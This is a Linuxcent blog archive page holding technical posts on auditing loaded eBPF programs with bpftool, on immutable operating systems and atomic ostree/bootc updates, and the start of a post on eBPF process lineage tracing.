Linux Archives - Linuxcent

The Audit Playbook — Four Commands to See Any Cluster

Vamshi Krishna Santhapuri — Tue, 14 Jul 2026 02:00:00 +0000

Reading Time: 8 minutes

eBPF: From Kernel to Cloud, Episode 14
What Is eBPF? · The BPF Verifier · eBPF vs Kernel Modules · eBPF Program Types · eBPF Maps · CO-RE and libbpf · XDP · TC eBPF · bpftrace · Network Flow Observability · DNS Observability · LSM and Tetragon · Process Lineage · The Audit Playbook

TL;DR

You can audit eBPF programs on any Kubernetes cluster with four bpftool commands, regardless of which vendor’s tool loaded them — prog show, map show, net show (plus cgroup tree), and prog dump xlated
(bpftool = the kernel-shipped CLI for inspecting loaded eBPF programs and maps directly, independent of any userspace agent or vendor tooling)
bpftool prog show gives you the inventory: every loaded program, its type, and — via its pinned path — usually which tool owns it
bpftool map show gives you the state: what data each program is reading or writing, cross-referenced by the map_ids from the first command
bpftool net show and bpftool cgroup tree give you the attachment points: which interface, which qdisc, which cgroup hook — where enforcement actually happens
bpftool prog dump xlated gives you the behavior: what the program does at the instruction level, for the cases where the pinned path doesn’t tell you enough
This sequence works whether the cluster is running Cilium, Falco, Tetragon, a hand-rolled XDP filter, or something with no documentation at all — the kernel doesn’t care who loaded the program

You inherit a cluster with no runbook, no README, and no answer to “what’s making the policy decisions.” Something on these nodes is dropping packets, or blocking execs, or both — and you have about ten minutes before the incident call starts. kubectl get pods -A tells you nothing; whatever this is doesn’t run as a normal pod workload you can just describe.

Quick Check: Is Anything Actually Loaded on This Node?

# On any cluster node — count loaded eBPF programs
bpftool prog show | wc -l

# Expected output (a cluster running Cilium + Tetragon):
# 47

# Break it down by program type
bpftool prog show | grep -oE '^\S+:\s+\K\S+' 2>/dev/null || \
bpftool prog show -j | jq -r '.[].type' | sort | uniq -c

#   12 cgroup_skb      ← Cilium's per-cgroup socket filtering
#    8 sched_cls       ← TC programs (Cilium's netdev enforcement, from EP08)
#    6 kprobe          ← Tetragon's syscall hooks (from EP12)
#    4 tracepoint      ← process/exec tracing (from EP13)
#    2 xdp             ← XDP fast-path filtering (from EP07)

Not running Cilium or Tetragon? On EKS or GKE? The count won’t be zero even on a “vanilla” managed cluster — kube-proxy’s eBPF mode (if enabled), the CNI’s own eBPF datapath, and any sidecar-less service mesh all load programs. A count of zero on a production node is itself worth investigating; it usually means you’re looking at a node pool that hasn’t finished bootstrapping, or bpftool is running in a mount namespace that can’t see the host’s BPF filesystem.

Forty-seven loaded programs and no idea which ones matter. That’s the audit playbook’s job: turn “something is loaded” into “here is exactly what it is, what it holds, where it enforces, and what it does” — four commands, in order, no vendor documentation required.

Command 1: Inventory — What’s Loaded, and Who Owns It

bpftool prog show lists every eBPF program currently loaded into the kernel on that node, regardless of which process or tool loaded it. The kernel tracks programs independently of the userspace agent that created them — the program keeps running even if that agent’s pod is deleted.

bpftool prog show

6: cgroup_skb  tag 6deef7357e7b4530  gpl
    loaded_at 2026-06-02T03:14:22+0000  uid 0
    xlated 296B  jited 187B  memlock 4096B  map_ids 4,5
142: sched_cls  name cil_from_netdev  tag a04f5eef06a7f555  gpl
    loaded_at 2026-06-02T03:15:01+0000  uid 0
    xlated 12664B  jited 7532B  memlock 16384B  map_ids 9,10,11,14
    pinned /sys/fs/bpf/tc/globals/cil_from_netdev
201: kprobe  name generic_kprobe_e  tag 88df3d0a1c9e2b41  gpl
    loaded_at 2026-06-02T04:02:18+0000  uid 0
    xlated 3184B  jited 1980B  memlock 8192B  map_ids 22,23
    pinned /sys/fs/bpf/tetragon/generic_kprobe_e

Program tag — a SHA hash of the program’s instruction stream, computed by the kernel at load time. Two programs with the same tag are running byte-identical bytecode, even if they were loaded by different processes or have different names. It’s how you confirm two clusters are actually running the same version of a security tool without comparing source.

Pinned path — a program pinned to /sys/fs/bpf/... survives after the process that loaded it exits, because the reference is held by a file in the in-kernel BPF filesystem instead of by an open file descriptor in a running process. Most production tools pin their programs; ad hoc programs loaded by a one-off script usually don’t, and disappear the moment that script’s process exits.

The pinned field is doing most of the audit work here. /sys/fs/bpf/tc/globals/... is Cilium’s convention. /sys/fs/bpf/tetragon/... is Tetragon’s. Falco’s kernel-module and eBPF probe modes typically pin under /sys/fs/bpf/falco*. A program with no pinned line at all was loaded without a persistent reference — worth asking what process is holding its file descriptor open, because if that process dies, the program unloads.

For operators (not writing eBPF): if a security tool’s DaemonSet pod restarts and its programs don’t reappear in bpftool prog show after the container comes back up, that’s a real signal — the tool failed to re-pin or re-attach, and you’re running with a gap in coverage even though the pod shows Running. This is a more reliable health check than the pod’s own readiness probe, which usually only checks that the userspace agent process is alive.

Command 2: State — What Data These Programs Are Keeping

Every map_ids value in the prog show output points at a BPF map — the persistent, kernel-resident data structure the program reads or writes on every invocation (see eBPF Maps for how these work). bpftool map show inventories them the same way.

bpftool map show id 9

9: hash  name cilium_lb4_service  flags 0x0
    key 8B  value 24B  max_entries 65536  memlock 6291456B

bpftool map show id 22

22: lru_hash  name tg_execve_map  flags 0x0
    key 4B  value 128B  max_entries 32768  memlock 12582912B
    pinned /sys/fs/bpf/tetragon/tg_execve_map

Map ID 9 is a service load-balancer table — 65,536 entries, keyed by a service identifier. Map ID 22 is Tetragon’s exec cache (the same process-tracking structure covered in process lineage reconstruction), an LRU hash that evicts its oldest entries once 32,768 processes have been tracked.

The name field alone often tells you what the map is for — cilium_lb4_service, tg_execve_map — because most production tools name their maps descriptively rather than leaving them anonymous. When a map has no descriptive name, dump a few entries and read the shape of the data:

bpftool map dump id 9 | head -5

key: 0a 00 00 01 00 00 00 50  value: c0 a8 01 0a 00 00 00 50 00 00 00 01 ...

Raw bytes without a BTF type description are harder to read, but the sizes still tell you something: an 8-byte key and 24-byte value, repeated 65,536 times, is a fixed-size lookup table — consistent with a service or connection map, not a log or event buffer.

Command 3: Attachment — Where Enforcement Actually Happens

Inventory and state tell you what’s loaded and what it remembers. They don’t tell you where in the packet or syscall path the program actually runs. bpftool net show answers that for network-attached programs (XDP and TC, from EP07 and EP08); bpftool cgroup tree answers it for cgroup-attached programs (socket and syscall hooks).

bpftool net show

xdp:
eth0(2) driver id 88 tag 3b185187f1855c4c

tc:
eth0(2) clsact/ingress cil_from_netdev id 142
eth0(2) clsact/egress cil_to_netdev id 143

bpftool cgroup tree

CgroupPath
ID       AttachType      AttachFlags     Name
/sys/fs/cgroup
         6        cgroup_skb      multi
        18        cgroup_sock_addr multi           cil_sock4_connect

Program ID 142 — the same cil_from_netdev you saw in the prog show output — is attached to eth0‘s ingress clsact qdisc. That’s a direct answer to “is something making kernel-level policy decisions on this interface”: yes, at TC ingress, before the packet reaches any userspace process. Program ID 6 (cgroup_skb) is attached at the root cgroup with multi flags, meaning it stacks with other programs there rather than replacing them — the enforcement isn’t exclusive to one tool.

multi vs exclusive attach flags: cgroup and TC attachments can either replace whatever was attached before (exclusive) or stack alongside it (multi/BPF_F_ALLOW_MULTI). A cluster running more than one eBPF-based tool at the same hook point relies on multi attachment; if you see an exclusive attach where you expected two tools to coexist, one of them silently lost its hook.

Command 4: Behavior — What It Actually Does

The first three commands answer what’s loaded, what it remembers, and where it runs. They don’t answer what it does — and that matters when the pinned path is missing, unfamiliar, or you don’t trust it. bpftool prog dump xlated shows the program’s instructions after the verifier’s transformations, in a readable pseudo-assembly.

bpftool prog dump xlated id 142 | head -12

   0: (b7) r0 = 0
   1: (61) r2 = *(u32 *)(r1 +76)
   2: (61) r3 = *(u32 *)(r1 +80)
   3: (bf) r1 = r6
   4: (85) call bpf_skb_load_bytes#26
   5: (16) if w0 == 0x8 goto pc+3
   6: (05) goto pc+9
   7: (61) r1 = *(u32 *)(r6 +0)
   8: (55) r1 != 0x800 goto pc+7

You don’t need to hand-trace every instruction to get value out of this. Look for the helper calls — bpf_skb_load_bytes, bpf_map_lookup_elem, bpf_redirect, bpf_ktime_get_ns — because they name the kernel facilities the program actually touches. A program whose xlated dump is full of bpf_map_lookup_elem and comparison instructions against 0x800 (IPv4’s EtherType) is doing packet classification. One full of bpf_probe_read and bpf_get_current_task is reading process or memory state, not packets — a strong signal you’re looking at an observability or enforcement hook, not a network one, whatever its pinned path claims.

For operators (not writing eBPF): you will not read xlated dumps line by line during an incident. What you’re checking for is much narrower — does the helper call list match what the tool’s marketing says it does? A program that claims to be “read-only observability” but calls bpf_skb_store_bytes (which writes packet data) is not read-only. That mismatch is worth escalating before you trust the tool’s own dashboard.

Production Gotchas

bpftool needs CAP_BPF or root, and managed nodes don’t hand that out by default. On EKS and GKE, you typically can’t SSH to a node directly. Use kubectl debug node/ --image= -it -- chroot /host to get a privileged shell with host PID and network namespace access, or the cloud provider’s session-manager equivalent (AWS SSM, gcloud compute ssh). Confirm the debug image actually ships bpftool — it’s not in most minimal base images.

Program IDs are node-local and not stable across restarts. ID 142 today may be ID 89 after the node reboots and the DaemonSet reloads its programs. Don’t hardcode IDs in runbooks; always start from bpftool prog show on the specific node and re-derive the ID for that session.

xlated and jited dumps require the kernel to have kept the debug info. Some hardened kernel configs strip CONFIG_BPF_JIT_ALWAYS_ON debug metadata or disable kernel.bpf_stats_enabled, in which case prog dump returns less than shown here. If dumps come back empty, check sysctl kernel.bpf_stats_enabled before assuming the program itself is hiding something.

bpftool cgroup tree only shows attachments below the cgroup you run it from. On a Kubernetes node, run it from the root of the host’s cgroup filesystem (typically after the chroot /host from the debug pod above), not from inside a container’s own cgroup namespace, or you’ll only see a fraction of the attachments.

Pinned paths are a convention, not a guarantee. Nothing stops a tool from pinning under an unexpected path, or not pinning at all. Treat the pinned-path-to-vendor mapping as a strong hint that narrows your investigation, not as ground truth — confirm ownership with the tag (command 1) against the vendor’s published program hashes when it matters for an incident, not just a routine audit.

Quick Reference

What you want to know	Command
What’s loaded	`bpftool prog show`
Program count by type	`bpftool prog show -j \\| jq -r '.[].type' \\| sort \\| uniq -c`
What state a program keeps	`bpftool map show id` (from `map_ids` in prog show)
Sample map contents	`bpftool map dump id \\| head`
Where it’s attached (network)	`bpftool net show`
Where it’s attached (cgroup)	`bpftool cgroup tree`
What it actually does	`bpftool prog dump xlated id`
Confirm identical bytecode across nodes	Compare `tag` values from `prog show`
Privileged shell on a managed node	`kubectl debug node/ --image= -it -- chroot /host`

Key Takeaways

Four bpftool commands audit any eBPF-based tool on any Kubernetes cluster, regardless of vendor: prog show (inventory), map show (state), net show/cgroup tree (attachment), prog dump xlated (behavior)
The kernel tracks loaded programs independently of the userspace agent that loaded them — a program’s pinned path under /sys/fs/bpf/... usually identifies its owning tool by convention, but that convention is not enforced by the kernel
A program’s tag is a hash of its bytecode; matching tags across nodes confirm identical program versions without comparing source or vendor documentation
map_ids in prog show output link directly to bpftool map show, letting you trace from “a program is loaded” to “here’s exactly what data it reads and writes”
bpftool net show and cgroup tree answer where enforcement happens in the packet or syscall path — the same question the opening incident needed answered in ten minutes
When the pinned path and tag aren’t enough, bpftool prog dump xlated shows the actual kernel helper calls the program makes, which is the only way to confirm behavior when there’s no documentation to trust

What’s Next

EP14 is the audit playbook — the four commands you run in the first ten minutes on any cluster you’ve inherited, before you trust anything its existing tools tell you about themselves. EP15 goes deeper on one specific case where this matters most: Cilium’s own policy engine telling you traffic is allowed while packets keep dropping. bpftool map dump on the right map — not cilium policy get — is what shows you what’s actually being enforced.

Next: Cilium policy verification — what bpftool shows that cilium policy get doesn’t

Get EP15 in your inbox when it publishes → linuxcent.com/subscribe

The post The Audit Playbook — Four Commands to See Any Cluster appeared first on Linuxcent.

Atomic OS Updates Explained: How ostree and bootc Actually Work

Vamshi Krishna Santhapuri — Mon, 06 Jul 2026 21:30:17 +0000

Reading Time: 7 minutes

Immutable OS Series, Episode 2
← EP01: What Is an Immutable OS? · EP02: Atomic OS Updates Explained · All Immutable OS Episodes →

TL;DR

Atomic OS updates explained at the mechanism level: ostree stores every deployment as a content-addressed commit, not a set of files you overwrite — “atomic” is a property of the filesystem layout, not a promise a script makes
The actual atomicity boundary is a single bootloader configuration write — everything before that point is fully reversible, and everything after it is a clean boot into a complete, self-contained deployment
bootc builds on the same ostree deployment model but starts from a Containerfile, so building a bootable OS image uses the same toolchain as building an application container
Power loss mid-update is a non-event: the system reboots into whatever the bootloader pointed at before the write, because the new deployment was never referenced until that one atomic write succeeded
Rollback targets aren’t kept forever — garbage collection and configurable deployment limits mean “you can always roll back” has a real, finite window
This is the mechanism EP01 described in outline; this episode is what actually happens on disk

The Big Picture: A Commit Graph, Not a File Tree

ostree REPOSITORY (content-addressed objects)
─────────────────────────────────────────────
  commit A (hash 8f2a1c...)  ──parent──▶  commit B (hash 3b7e9d...)
       │                                        │
       │ checked out as                         │ checked out as
       ▼                                        ▼
  /ostree/deploy/os/deploy/8f2a1c...    /ostree/deploy/os/deploy/3b7e9d...
  (READ-ONLY bind mount → /)            (READ-ONLY bind mount → /, once active)

BOOTLOADER CONFIG (the atomicity boundary)
─────────────────────────────────────────────
  grub.cfg / loader entries
       │
       └── points to exactly ONE deployment directory at a time
           Changing this pointer IS the update. Nothing else has
           to happen for the new deployment to become "the OS."

Atomic OS updates explained simply: ostree never edits a running deployment’s files. It writes an entirely new, complete deployment as a set of immutable, content-addressed objects somewhere else on disk, and the update becomes real the instant a single bootloader entry is rewritten to point at it. EP01 showed this from the outside — rpm-ostree status, rollback, a clean before/after. This episode is what’s actually happening underneath those commands.

Every Deployment Is a Commit, Not a Directory You Edited

A traditional package manager mutates files in place: apt upgrade overwrites /usr/bin/curl with a new binary, in the same inode, on the same live filesystem the kernel and every running process are using. If that write is interrupted, or if two updates race, the result is whatever state the filesystem happened to be in when things stopped — there’s no defined “before” state to return to, because the before state was destroyed in place.

This is the same declarative-artifact idea Stratum’s HardeningBlueprint YAML applies to OS hardening — the artifact either fully exists or the build failed, with nothing skippable in between — extended down to the filesystem itself.

ostree does something structurally different: every file in a deployment is stored as an object named by the SHA-256 hash of its content, inside a repository (/ostree/repo). A deployment is a commit — a tree of these hashed objects, checksummed all the way up, the same content-addressing model Git uses for a repository’s history. Deploying an update means:

Pull or build the new commit into the local ostree repository (pure object storage — this doesn’t touch the running system at all)
Check out that commit into a new deployment directory (/ostree/deploy//deploy/) — still doesn’t touch the running system
Write a new bootloader entry pointing at that new deployment directory
Reboot

Steps 1 and 2 can take minutes, involve gigabytes of I/O, and fail halfway through with zero consequence — the running system’s deployment directory was never opened for writing. There is no partial-update state visible to anything, because nothing that’s currently running was ever touched.

The Atomicity Boundary: One Bootloader Write

“Atomic” specifically refers to step 3. Rewriting a bootloader entry (a GRUB grub.cfg regeneration, or a systemd-boot loader entry file) is small enough to be a single filesystem operation — either the new entry exists on disk, or it doesn’t. There’s no meaningful “half-written bootloader entry” state that a power failure can leave you in: at boot, the firmware reads whatever bootloader configuration fully exists, and that configuration names exactly one deployment.

POWER LOSS DURING STEP 1 or 2 (pulling/staging the new commit)
────────────────────────────────────────────────────────────
Next boot: bootloader entry still points at the OLD deployment.
The new commit's partial objects sit in the repo, orphaned,
inert. System boots exactly as if the update never started.

POWER LOSS DURING STEP 3 (bootloader entry write)
────────────────────────────────────────────────────────────
Filesystem-level atomic rename guarantees the entry write itself
either completes or doesn't. Next boot: either the old deployment
(write didn't land) or the new one (write landed) — never a
corrupted bootloader config caught in between.

POWER LOSS AFTER STEP 3, BEFORE REBOOT
────────────────────────────────────────────────────────────
Doesn't matter — the running system hasn't changed. The new
deployment activates on the NEXT boot, whenever that happens.

This is the property EP01 called “the system is never caught half-updated” — and now you can see exactly why: every step before the bootloader write is invisible to the running system, and the bootloader write itself is small enough that the filesystem’s own atomic-rename guarantee covers it. There’s no custom transaction logic to trust. It’s a property of doing the update in the right order, using a write that was already atomic.

bootc: The Same Model, a Container Build Toolchain

bootc uses this identical deployment mechanism — the on-disk layout, the bootloader swap, the rollback behavior are all the same ostree machinery. What bootc changes is how the commit gets built in the first place.

# Containerfile — this IS the OS image definition
FROM quay.io/fedora/fedora-bootc:41

RUN dnf install -y nginx && \
    systemctl enable nginx && \
    dnf clean all

# Standard container build — no special OS-image tooling required

# Build it exactly like an application container
$ podman build -t myregistry.example.com/os/web-node:v12 .
$ podman push myregistry.example.com/os/web-node:v12

# On the target machine — pulls the image, converts it to an
# ostree commit, stages it as the next deployment
$ bootc switch myregistry.example.com/os/web-node:v12
Queued for next boot: myregistry.example.com/os/web-node:v12
Please reboot to complete the update.

$ systemctl reboot

bootc switch and bootc upgrade do the same three-step dance as raw ostree — pull the new commit (here, derived from a container image’s layers instead of an RPM-based tree), stage a deployment directory, write the bootloader entry — the difference is entirely in step 1: bootc converts OCI container image layers into an ostree commit instead of building one from package installation directly. Your existing container registry, existing Containerfile conventions, and existing image-signing pipeline all apply unchanged to what is, underneath, a bootable operating system.

Where ostree and bootc Actually Diverge

	Raw ostree (Fedora CoreOS style)	bootc
Image defined as	`rpm-ostree compose` treefile (custom format)	Standard `Containerfile`
Build tooling	ostree/rpm-ostree-specific	Any OCI-compatible builder (`podman`, `buildah`, `docker`)
Registry/distribution	ostree’s own HTTP-based repo protocol, or OSTree-in-OCI	Standard container registry (Quay, Docker Hub, ECR, GHCR)
Deployment mechanism on disk	ostree commits, A/B deployments	Identical — ostree commits, A/B deployments
Rollback command	`rpm-ostree rollback`	`bootc rollback`
Best fit	Teams already fluent in ostree/ Fedora tooling	Teams that want OS images to fit their existing container CI/CD

Nothing about atomicity, rollback safety, or the deployment model changes between the two — bootc’s entire value proposition is packaging the same guarantee behind tooling most infrastructure teams already have muscle memory for.

The Part EP01 Didn’t Mention: Rollback Has a Shelf Life

“The previous deployment is always intact for rollback” (EP01’s phrasing) is true, but not indefinitely. Each deployment consumes real disk space — a full OS tree’s worth of objects, though ostree deduplicates identical objects across commits so an incremental update doesn’t cost a second full copy. Two mechanisms limit how far back you can actually roll:

Deployment count limits. Most configurations keep a bounded number of deployments (commonly 2–3). Once you’ve upgraded past that limit, the oldest deployment is pruned — rpm-ostree cleanup or an automatic policy removes it, and its objects become eligible for garbage collection if nothing else references them.

Garbage collection reclaims orphaned objects. ostree prune (or rpm-ostree cleanup -p) removes any object in the repository not reachable from a currently-kept deployment or a pinned ref. If you pruned a deployment last week and you need to roll back to it today, that commit is gone — not degraded, not slow to restore, simply no longer present.

# See exactly what's kept and what's eligible for cleanup
$ ostree admin status
  fedora-coreos 38.20240210.3.0 (booted)   # current
  fedora-coreos 38.20240115.2.0            # one rollback available

# Pin a deployment explicitly if you need a longer-lived rollback
# target than the default retention policy provides
$ ostree admin pin 1

If your incident-response plan assumes “we can always roll back to last month’s known-good state,” verify that against your actual retention policy — the default is usually one previous deployment, not an archive.

Quick Reference

# Inspect the commit graph and current deployments
ostree admin status                      # deployments + which is booted
ostree log                          # commit history for a branch
ostree show                    # inspect a specific commit

# rpm-ostree (Fedora CoreOS / Silverblue)
rpm-ostree status                        # current + staged, same as EP01
rpm-ostree cleanup -p                    # prune old deployments + GC

# bootc
bootc status                             # current + staged image
bootc switch                  # move to a different image
bootc upgrade                            # pull latest tag, stage it
bootc rollback                           # revert to previous deployment

Production Gotchas

“Atomic” doesn’t mean “instant.” Staging a new deployment can take as long as a full OS install — the atomicity guarantee is about the swap being indivisible, not about the whole process being fast. Budget real time for the pull-and-stage phase in maintenance windows.

Deduplication means disk usage doesn’t scale linearly with deployment count, but it isn’t free either. A kernel or major package version bump touches enough objects that “just keep 5 deployments for safety” can use more disk than teams expect. Monitor /ostree/repo size, don’t assume it’s negligible.

Pinning a deployment and forgetting about it silently defeats garbage collection. ostree admin pin is the right tool for “I need to guarantee this stays available,” but a pinned deployment never gets reclaimed automatically — audit pins periodically or disk usage grows unbounded.

bootc’s registry dependency is a new failure mode ostree-native updates didn’t have. If your container registry is unreachable, bootc upgrade fails the same way a registry-down event fails an application deployment — factor registry availability into your OS update SLA the same way you already do for app deployments.

Key Takeaways

Every ostree deployment is a content-addressed commit, not a set of files mutated in place — that’s what makes “atomic” a filesystem property instead of a script’s promise
The actual atomicity boundary is a single bootloader entry write; everything before it is invisible to the running system, everything after it takes effect on next boot
bootc uses the identical deployment mechanism, but builds commits from standard Containerfiles and distributes them through standard container registries
Rollback is real but bounded — deployment limits and garbage collection mean “always roll back” has a specific, checkable retention window, not an unlimited one
ostree and bootc differ in build/distribution tooling, not in the safety guarantees the deployment model provides

What’s Next

EP02 covered the mechanism in the abstract. EP03 runs it day-to-day — Fedora CoreOS and Silverblue in practice: what changes about dnf install, package layering, troubleshooting, and rollback when you’re actually living on top of this model instead of reading about it.

Next: EP03 — Fedora CoreOS / Silverblue in Practice

Get EP03 in your inbox when it publishes → linuxcent.com/subscribe

The post Atomic OS Updates Explained: How ostree and bootc Actually Work appeared first on Linuxcent.

What Is an Immutable OS — and Why Hardening Isn’t Enough

Vamshi Krishna Santhapuri — Mon, 06 Jul 2026 21:29:28 +0000

Reading Time: 7 minutes

Immutable OS Series, Episode 1
← Stratum EP06: Stratum — OS Hardening as a Platform · EP01: What Is an Immutable OS? · EP02: Atomic OS Updates Explained →

TL;DR

An immutable OS is one where the running root filesystem is read-only — the only way to change it is to boot a new, versioned image, never to mutate the one that’s live
Hardening an image proves it’s correct at build time. Immutability is what keeps that proof true after the image boots into production
The mechanism is atomic A/B updates: a new OS image is staged fully, then swapped in as one operation — the system is never caught half-updated
A bad update is one command away from undone: rpm-ostree rollback && systemctl reboot — no reinstall, no image rebuild
bootc, Fedora CoreOS/Silverblue, and Talos Linux are three real implementations of this model, each targeting a different deployment shape
This is not a replacement for Stratum’s hardening pipeline — it’s what keeps a hardened image hardened after it ships

The Big Picture: A Snapshot vs. a Guarantee

TRADITIONAL MUTABLE OS                    IMMUTABLE OS
────────────────────────                  ────────────

Golden image (grade: A)                   Deployment A (active, read-only)
        │ boots into prod                          │
        ▼                                           │  atomic swap
Running root filesystem (read-write)                ▼
        │                                  Deployment B (staged)
        │  SSH fix, config-mgmt run,               │
        │  ad-hoc package install                   │  if boot fails
        ▼                                           ▼
Drifted state — no build artifact         Rollback (one command,
matches what's actually running            no reinstall)

An immutable OS is a system whose root filesystem cannot be changed in place — every change ships as a new, complete, versioned image, and the system swaps to it atomically or not at all. That’s the one-sentence answer, and it’s the reason this series exists: a hardening pipeline can prove an image is correct on the day it’s built, but on a traditional mutable root filesystem, nothing stops that proof from becoming false the day after.

The Gap Stratum’s Grade Doesn’t Cover

Stratum’s series ended with a hardened, graded, pipeline-gated image — POST /api/pipeline/scan fails the build if the grade drops below B, so an unhardened image never reaches production. That solved a real problem: images used to ship broken by default, and now they don’t.

But watch what happens six weeks later. An on-call engineer SSHes into a production node at 2 a.m. to unblock an incident and leaves behind a one-line iptables rule that was never reviewed. A config-management run pushes an unrelated package upgrade because someone’s playbook target list was too broad. A well-meaning teammate installs a debugging tool “just for now” and forgets to remove it. None of this touches the build pipeline. None of it fails a scan, because no scan runs again after the image ships.

Six months later, an auditor asks for evidence that the instance matches its compliance grade. The honest answer is: it did, once, the day it was built. Nobody can say what’s true about it now — the golden image and the running system are two different, unreconciled things.

That’s the gap. Hardening is a build-time guarantee. Immutability is what makes it a runtime guarantee too, because there’s no path left for a change to happen except through the build pipeline that produced the image in the first place.

From Golden Images to Immutable OS: A Short History

Golden images (Stratum’s territory) solved the “every instance starts insecure” problem by baking the correct configuration in at build time — the same idea as infrastructure-as-code applied to an OS baseline. Configuration management tools (Ansible, Chef, Puppet) then tried to solve drift by re-applying the desired state on a schedule, converging the system back toward correctness every run.

Convergence is not the same as prevention. A config-management run that fires every 30 minutes still leaves a 29-minute window where the system can be anything. And convergence tools can only fix drift they know to look for — an ad-hoc apt install that isn’t in anyone’s playbook just sits there, invisible, until someone happens to notice.

Immutable OS designs remove the window entirely. If the root filesystem is mounted read-only, apt install on a running node doesn’t drift the system — it fails, because there’s nowhere to write the new package. The only way to add that package is to build a new image and boot into it. Prevention replaces convergence.

How Atomic Updates Actually Work

Left: a hardened golden image drifts once it’s live on a mutable root filesystem. Right: an immutable OS stages the next image fully before swapping to it atomically, with rollback as a first-class operation.

The core mechanism, used by ostree-based systems (Fedora CoreOS, Silverblue) and bootc alike, is A/B deployment:

Two deployment slots exist on disk at all times — call them A (active) and B (staged). Only one is booted at a time.
An update downloads and assembles the entire new OS image into the inactive slot. This can take minutes. The running system is completely unaffected while it happens — there is no partial state visible to production traffic.
The bootloader entry swaps atomically. This is a single operation, not a sequence of file writes — the system either boots the new deployment on next reboot, or it doesn’t. There’s no window where half the files are new and half are old.
If the new deployment fails to boot or fails a health check, rolling back means booting the previous slot — the old deployment was never deleted, never modified. It’s still exactly what it was before the update.

# Check current and staged deployments
$ rpm-ostree status
State: idle
Deployments:
● ostree://fedora:fedora/38/x86_64/coreos
                   Version: 38.20240210.3.0 (2024-02-10T09:14:22Z)
                   Commit: 8f2a1c...

  ostree://fedora:fedora/38/x86_64/coreos
                   Version: 38.20240115.2.0 (2024-01-15T11:02:03Z)
                   Commit: 3b7e9d...

# Roll back to the previous deployment — no rebuild, no reinstall
$ rpm-ostree rollback
Moving 'ostree://fedora:fedora/38/x86_64/coreos' (38.20240115.2.0) to be first deployment
Run "systemctl reboot" to start a rollback

$ systemctl reboot

The ● marks the currently booted deployment. The second entry never disappeared when the update landed — it’s exactly the filesystem that was running two weeks ago, byte for byte, ready to boot again.

bootc — covered in depth in EP04 — applies the same A/B model but defines the OS image as an OCI container image, built with a standard Containerfile and pushed to a normal container registry. The deployment mechanism is the same; the packaging format is the one most infrastructure teams already have tooling for.

What You Give Up, and What You Get Back

	Traditional mutable OS	Immutable OS
`apt install`/`dnf install` on a running node	Works, silently drifts the system	Fails — no writable path for it to take
Config-management convergence loop	Required to fight drift	Not needed — nothing to converge
“What changed since deployment?”	Shell history, playbook logs, guesswork	`rpm-ostree status` / `bootc status` — exact, versioned answer
Undoing a bad update	Reinstall, restore from backup, or manual repair	One command, one reboot
Auditing compliance months later	Grade describes the image, not the running system	Grade describes the running system, because it can’t have changed
Debugging tools installed ad hoc	Common, invisible in inventory	Requires a new image — visible in version control

The trade-off is real: an immutable OS removes a workflow a lot of engineers rely on — the quick SSH fix. That’s not a bug in the design. It’s the entire point. If the quick fix is impossible, it can’t happen accidentally, and it can’t happen without going through review.

Three Ways This Actually Ships Today

This series covers each of these in depth over the coming episodes — for now, know they exist and roughly where each one fits:

Fedora CoreOS / Silverblue (EP03) — ostree-based, general-purpose immutable Linux. CoreOS targets servers and container hosts; Silverblue targets immutable desktops. Both use rpm-ostree for the deployment model shown above.
bootc (EP04) — an immutable OS image defined as a container image and booted directly, no separate “OS build” toolchain from your application build toolchain. Newer, and increasingly the direction RHEL-family distros are heading.
Talos Linux (EP05) — purpose-built for Kubernetes nodes. No SSH, no shell, no package manager at all — the only interface is an API (talosctl). The most aggressive point on this spectrum: not just read-only, but no interactive access whatsoever.

None of these require you to abandon Stratum. A bootc image or a Fedora CoreOS image can still be built from a hardened, CIS-benchmarked base — the hardening pipeline and the immutability model solve different problems and compose cleanly.

Production Gotchas

Immutability doesn’t mean “no state.” /etc and /var are typically still writable on ostree-based systems (application data, logs, local config overrides have to live somewhere). “Immutable” means the OS binaries and base configuration can’t be mutated in place — read the docs for your specific distro to know exactly what’s writable.

Rollback isn’t instant if you don’t test it first. rpm-ostree rollback works, but if you’ve never practiced it, the first time you run it under incident pressure is the wrong time to discover a health check you forgot to configure. Rehearse rollback the same way you’d rehearse a database failover.

Container image tooling doesn’t automatically make an OS image safe. bootc images are built like container images, which means it’s easy to accidentally treat them like disposable containers instead of long-lived OS deployments — with all the patching and lifecycle discipline that implies.

Not everything you run today has an immutable-OS story yet. Legacy configuration management (Puppet/Chef agents that expect to write to /etc continuously) and some monitoring agents assume a mutable filesystem. Check compatibility before you migrate a fleet.

Quick Reference

# ostree/rpm-ostree (Fedora CoreOS, Silverblue)
rpm-ostree status                  # current + staged deployments
rpm-ostree upgrade                 # stage the next image
rpm-ostree rollback                # revert to the previous deployment
ostree admin status                # lower-level deployment inspection

# bootc
bootc status                       # current + staged image, digest-pinned
bootc upgrade                      # pull and stage the next image
bootc rollback                     # revert to the previous deployment

# Talos Linux (API-only, no shell)
talosctl version                   # node + API version
talosctl get machineconfig         # current applied config
talosctl upgrade --image      # stage a new node image

Key Takeaways

A hardened image is a build-time guarantee; an immutable OS is what makes that guarantee hold at runtime too
Atomic A/B deployment means the system is never caught half-updated, and the previous deployment is always intact for rollback
Config-management convergence fights drift on a schedule; immutability removes the writable path drift needs to happen at all
rpm-ostree/bootc give you an exact, versioned answer to “what changed” instead of shell history and guesswork
This composes with Stratum’s hardening pipeline — it doesn’t replace it

What’s Next

EP01 established the gap: hardening proves an image correct once, at build time, and a mutable root filesystem gives that proof an expiration date nobody tracks. EP02 goes one level deeper into the mechanism that closes it — exactly how ostree and bootc implement atomic A/B updates under the hood, including how the bootloader is involved and what “atomic” actually guarantees.

Next: EP02 — Atomic OS Updates Explained: How ostree and bootc Actually Work

Get EP02 in your inbox when it publishes → linuxcent.com/subscribe

The post What Is an Immutable OS — and Why Hardening Isn’t Enough appeared first on Linuxcent.

Process Lineage — Reconstructing What Happened After the Fact

Vamshi Krishna Santhapuri — Thu, 18 Jun 2026 02:00:00 +0000

Reading Time: 9 minutes

eBPF: From Kernel to Cloud, Episode 13
What Is eBPF? · The BPF Verifier · eBPF vs Kernel Modules · eBPF Program Types · eBPF Maps · CO-RE and libbpf · XDP · TC eBPF · bpftrace · Network Flow Observability · DNS Observability · LSM and Tetragon · Process Lineage

TL;DR

Process lineage with eBPF hooks fork and exec at the kernel level — building a tamper-resistant record of every process spawned, tied to its parent, pod, namespace, and timestamp
(kprobe on fork/exec = an eBPF program that fires every time the kernel’s fork() or execve() system call runs, capturing process name, PID, parent PID, and arguments before any userspace observer could be bypassed)
Application logs and container stdout can be deleted or suppressed by a compromised process; kernel-level process events written to a ringbuf and exported to a persistent store cannot
